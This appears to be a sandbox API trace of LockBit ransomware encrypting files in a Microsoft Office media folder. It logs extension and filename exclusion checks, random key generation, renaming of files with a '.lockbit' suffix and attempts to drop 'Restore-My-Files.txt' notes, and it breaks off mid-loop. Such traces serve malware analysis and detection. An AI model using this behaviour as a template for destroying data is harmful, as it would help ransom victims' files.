0x14c [0199.953] malloc (_Size=0x40068) returned 0x3df0008 [0199.953] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1388) returned 1 [0199.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.954] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.959] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.959] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.959] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.960] free (_Block=0x1fa2ed8) [0199.960] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.960] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.960] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f586200, ftCreationTime.dwHighDateTime=0x1bdcf1d, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3f586200, ftLastWriteTime.dwHighDateTime=0x1bdcf1d, nFileSizeHigh=0x0, nFileSizeLow=0x822, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18203_.WMF", cAlternateFileName="")) returned 1 [0199.960] lstrcmpiW (lpString1=".", lpString2="BD18203_.WMF") returned -1 [0199.960] lstrcmpiW (lpString1="..", lpString2="BD18203_.WMF") returned -1 [0199.960] PathFindExtensionW (pszPath="BD18203_.WMF") returned=".WMF" [0199.960] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.960] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.960] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.961] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.962] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.962] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18203_.WMF") returned 1 [0199.962] lstrcmpiW (lpString1="ntldr", lpString2="BD18203_.WMF") returned 1 [0199.962] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18203_.WMF") returned 1 [0199.962] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18203_.WMF") returned 1 [0199.962] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18203_.WMF") returned -1 [0199.962] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18203_.WMF") returned 1 [0199.962] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18203_.WMF") returned 1 [0199.962] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.963] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF") returned=".WMF" [0199.963] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.963] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.963] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.964] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.964] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF.lockbit") returned 79 [0199.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18203_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.964] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.965] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.965] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2082) returned 1 [0199.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.965] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.969] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.969] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.970] free (_Block=0x1fa2ed8) [0199.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.970] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.970] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7db3a00, ftCreationTime.dwHighDateTime=0x1bddcb2, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd7db3a00, ftLastWriteTime.dwHighDateTime=0x1bddcb2, nFileSizeHigh=0x0, nFileSizeLow=0x814, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18204_.WMF", cAlternateFileName="")) returned 1 [0199.970] lstrcmpiW (lpString1=".", lpString2="BD18204_.WMF") returned -1 [0199.970] lstrcmpiW (lpString1="..", lpString2="BD18204_.WMF") returned -1 [0199.970] PathFindExtensionW (pszPath="BD18204_.WMF") returned=".WMF" [0199.970] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.971] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.972] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.972] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18204_.WMF") returned 1 [0199.972] lstrcmpiW (lpString1="ntldr", lpString2="BD18204_.WMF") returned 1 [0199.972] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18204_.WMF") returned 1 [0199.972] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18204_.WMF") returned 1 [0199.972] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18204_.WMF") returned -1 [0199.972] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18204_.WMF") returned 1 [0199.972] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18204_.WMF") returned 1 [0199.973] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.973] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF") returned=".WMF" [0199.973] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.973] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.973] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.974] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.974] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.974] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.974] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.974] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.974] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF.lockbit") returned 79 [0199.974] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18204_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.975] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.975] malloc (_Size=0x40068) returned 0x3d70450 [0199.975] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2068) returned 1 [0199.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.976] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.979] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.979] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.979] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.980] free (_Block=0x1fa2ed8) [0199.980] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.980] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.980] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58631200, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbcbd9a60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x58631200, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0x8da, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18205_.WMF", cAlternateFileName="")) returned 1 [0199.981] lstrcmpiW (lpString1=".", lpString2="BD18205_.WMF") returned -1 [0199.981] lstrcmpiW (lpString1="..", lpString2="BD18205_.WMF") returned -1 [0199.981] PathFindExtensionW (pszPath="BD18205_.WMF") returned=".WMF" [0199.981] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.981] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.982] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 